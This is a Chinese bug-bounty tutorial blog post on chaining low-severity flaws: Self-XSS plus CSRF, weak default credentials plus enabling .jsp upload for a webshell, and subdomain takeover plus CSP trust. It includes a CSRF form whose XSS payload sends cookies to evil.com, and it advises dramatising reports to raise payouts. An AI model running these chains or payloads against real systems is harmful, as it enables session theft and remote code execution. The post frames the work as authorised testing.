【SRC漏洞挖掘系列】第17期:漏洞组合拳(Chain Exploit)—— 把“蚊子”养成“恐龙”

上期回顾:我们学会了怎么把报告写得像"诺贝尔奖申请书"一样漂亮。但如果你手里只有几个"蚊子级"(低危)漏洞怎么办?

本期教你**"合体进化"** :把几个看似鸡肋的低危漏洞,组合成一个让厂商连夜起床修的 **Critical(严重)**​ 漏洞。🧬


一、 什么是漏洞组合拳?

单一漏洞可能无害,但链式反应是毁灭性的。

单独漏洞 危害等级 组合后 危害等级
Self-XSS (需自己点) 无危/忽略 + CSRF (强制别人点) 中危/高危
弱口令 (前台登录) 中危 + 后台文件上传 **严重 (Getshell)**​
子域名接管 低危 + 主站信任该域名 **高危 (窃取Cookie)**​

核心逻辑入口(Entry) -> 利用(Exploitation) -> 目标(Goal)


二、 实战 Case 1:Self-XSS + CSRF = 存储型 XSS

这是最经典的组合,也是 SRC 里的"捡钱"套路。

1. 漏洞现状

你发现一个个人资料页的输入框存在 XSS:<script>alert(1)</script>

问题 :这是 Self-XSS。只有你自己输入、你自己点,才能触发。厂商通常会回复:"无法影响其他用户,忽略。"

2. 寻找 CSRF

你检查修改资料的请求包,发现没有 Token 校验,也没有验证 Referer。

这意味着你可以构造一个 HTML 页面,诱导用户访问,页面自动提交表单修改资料。

3. 组合拳出击

Payload 构造

html 复制代码
<body onload="document.forms[0].submit()">
  <form action="https://target.com/user/update" method="POST">
    <!-- 把 XSS Payload 填入 nickname 字段 -->
    <input type="hidden" name="nickname" value="<script>fetch('https://evil.com?cookie='+document.cookie)</script>">
  </form>
</body>

结果

  1. 你把 evil.html发给管理员。

  2. 管理员打开页面。

  3. 页面自动提交表单,把管理员的昵称改成了 XSS Payload。

  4. 管理员刷新个人中心,Cookie 发送到了你的服务器。

  5. 评级飙升 :从"忽略"直接变成 "高危:存储型 XSS 接管管理员会话"。🎉


三、 实战 Case 2:弱口令 + 后台 Getshell

这是红队最常用的打点手法。

1. 漏洞现状

你通过信息收集,找到了一个老旧的泛微 OA 后台:oa.example.com

尝试默认口令:admin/admin123登录成功

评级中危(弱口令)

2. 寻找利用链

进入后台后,你不看文章管理,直接找系统设置 -> 附件上传 -> 文件类型限制

你发现可以把 .jsp添加到允许上传的类型列表中。

3. 组合拳出击

  1. 利用弱口令进入后台。

  2. 修改配置 :在后台把 .jsp加入允许上传的后缀。

  3. 上传 Webshell :上传 cmd.jsp

  4. 执行命令 :访问 https://oa.example.com/images/cmd.jsp?pwd=xxx

  5. 评级飙升 :从"中危"变成 "严重:远程代码执行(RCE)"。厂商会哭着给你发奖金。💰


四、 实战 Case 3:子域名接管 + 信任绕过

利用厂商对子域名的信任机制。

1. 漏洞现状

你发现 static.example.com是一个 CNAME ​ 指向 github.io的域名,但对应的 GitHub 仓库已被删除。

评级低危(子域名接管)

2. 寻找信任机制

你检查主站 www.example.com的 CSP(内容安全策略)或 CORS 配置。

发现 script-src 'self' static.example.com;

这意味着主站允许加载来自 static.example.com的 JS 脚本。

3. 组合拳出击

  1. 接管 :你在 GitHub 重建那个仓库,创建了一个 malicious.js

  2. 投毒 :在主站某个页面(如评论区)插入 <script src="https://static.example.com/malicious.js"></script>

  3. 利用:由于主站信任该域名,你的 JS 顺利执行,可以读取主站 Cookie 或进行 CSRF 操作。

  4. 评级飙升 :从"低危"变成 "高危:同源策略绕过/账户接管"


五、 SRC 报告中的"吹牛"技巧

写报告时,不要把漏洞分开写。要把它们串成一个惊心动魄的黑客故事

报告标题

【严重】通过弱口令与配置滥用组合拳实现泛微 OA 远程代码执行

描述话术

  1. 攻击者首先利用默认弱口令 admin/admin123突破前台认证(中危)。

  2. 进入后台后,发现可利用系统配置功能绕过文件上传限制,导致任意文件上传(高危)。

  3. 最终组合利用,攻击者可在服务器上执行任意系统命令,控制内网核心资产。

效果:厂商一看就知道你是个高手,奖金翻倍。📈


六、 互动与思考

💬 互动话题

大家还见过哪些神奇的组合拳?

比如 "短信轰炸 + 逻辑漏洞 = 无限提现"

或者 "SSRF + Redis = 内网 Getshell"

欢迎在评论区分享你的"组合技"!🥋


⚠️ 法律红线警示

  1. 严禁 在真实环境中演练"组合拳"攻击,除非你拥有明确的书面授权

  2. 严禁利用 Self-XSS + CSRF 攻击真实用户(如管理员),窃取其 Cookie 或会话。

  3. 严禁 利用弱口令进入后台后,进行破坏性操作 (删库、改配置)或下载敏感数据

  4. 测试原则

    • 所有组合攻击仅在本地靶场(如 Vulhub、自己搭建的虚拟机)中复现。

    • 报告中的截图必须对敏感信息进行重度打码

    • 证明"可以利用"即可,切勿实际执行恶意代码。

      **组合漏洞是为了展示危害的深度,而不是为了展示破坏的力度。请守住底线,做正义的链式反应。**​ 🛡️

下一期,我们将迎来系列终章:"众测实战与避坑指南"------ 如何在血海中杀出重围?"。想知道怎么挑选高奖金项目吗?敬请期待!🩸

相关推荐
其实防守也摸鱼21 分钟前
运维--安全与数据库
网络·数据库·学习·安全·安全威胁分析·数据库架构·软件安全
wbs_scy1 小时前
仿 muduo 高并发服务器项目:实现 Connection 连接管理模块,并整合 Any 上下文
运维·服务器·网络
熬夜苦读学习1 小时前
基于websocket的多用户五子棋网页游戏
linux·服务器·网络·websocket·网络协议·游戏·五子棋
拥抱太阳06162 小时前
HarmonyOS 应用开发《掌上英语》第14篇:可空类型与安全调用:ArkTS 的非空保障策略
安全
蝶恋舞者2 小时前
Wireshark 抓包工具
网络·测试工具·wireshark
Sirius Wu2 小时前
OpenClaw Observability 并发安全(Per-Request Hook)完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
xywww1683 小时前
AWS 账号安全加固:Root 与 IAM 用户的 MFA 设置实操清单
安全·云计算·aws
头茬韭菜3 小时前
4.3 BashTool 防御链 — 七层安全防御的工程实现
安全·ai
互联网科技看点3 小时前
2026年短信服务性价比分析:飞鸽云与头部云厂商
大数据·网络
数据知道4 小时前
BGP 劫持是怎么回事?运营商级路由安全科普
网络·安全·网络安全·智能路由器·bgp劫持